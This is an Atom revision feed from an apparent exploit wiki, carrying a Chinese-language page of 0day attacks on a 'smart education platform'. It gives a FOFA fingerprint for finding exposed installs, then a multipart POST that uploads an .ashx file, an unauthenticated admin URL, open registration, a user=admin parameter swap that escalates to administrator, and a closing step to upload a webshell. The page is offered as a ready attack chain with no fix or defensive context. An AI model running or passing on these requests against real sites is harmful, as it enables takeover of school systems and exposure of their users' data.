<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E5%B9%B3%E5%8F%B00day%2Fzh-hant</id>
	<title>智慧教育平台0day/zh-hant - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E5%B9%B3%E5%8F%B00day%2Fzh-hant"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E5%B9%B3%E5%8F%B00day/zh-hant&amp;action=history"/>
	<updated>2026-04-26T17:18:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E5%B9%B3%E5%8F%B00day/zh-hant&amp;diff=3501&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==任意用戶註冊漏洞==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E5%B9%B3%E5%8F%B00day/zh-hant&amp;diff=3501&amp;oldid=prev"/>
		<updated>2021-05-26T13:33:18Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==任意用戶註冊漏洞==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;/Widget/common/Service/CommonWidgetService.asmx/Categorylist&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Xnip2021-03-27_21-45-21.jpg | 500px]]&lt;br /&gt;
&lt;br /&gt;
==任意文件上傳漏洞==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
使用該Payload後返回任意內容即漏洞存在。&lt;br /&gt;
&lt;br /&gt;
===POC===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Post:&lt;br /&gt;
 &lt;br /&gt;
------WebKitFormBoundaryxJBEcLK1xdylqBhP&lt;br /&gt;
Content-Disposition: form-data;name=&amp;quot;fileType&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
2222.ashx&lt;br /&gt;
------WebKitFormBoundaryxJBEcLK1xdylqBhP&lt;br /&gt;
Content-Disposition: form-data;name=&amp;quot;file&amp;quot;; filename=&amp;quot;2222.jpg&amp;quot;&lt;br /&gt;
Content-Type: image/jpeg&lt;br /&gt;
 &lt;br /&gt;
1&lt;br /&gt;
------WebKitFormBoundaryxJBEcLK1xdylqBhP—&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
通過構造的POC成功上傳文件。&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==未經授權訪問漏洞==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/SmartMobile/MobileIndex.aspx?uname=admin&amp;amp;orgId=0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
直接進入管理員後台，需要登錄的提示綁定賬號，這時候需要註冊一個賬號登錄。&lt;br /&gt;
&lt;br /&gt;
==任意用戶註冊漏洞==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 Module/SSO/SJS_Register.aspx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
&lt;br /&gt;
註冊成功後，登錄到用戶主頁&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
修改&amp;lt;code&amp;gt;user=admin&amp;lt;/code&amp;gt;，發現界面發生變化，用戶變為管理員&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
進入管理員後台頁面&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&amp;amp;orgId=0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Getshell==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
CMS圖片上傳沒有過濾，修改fileType並且上傳Webshell即可。&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>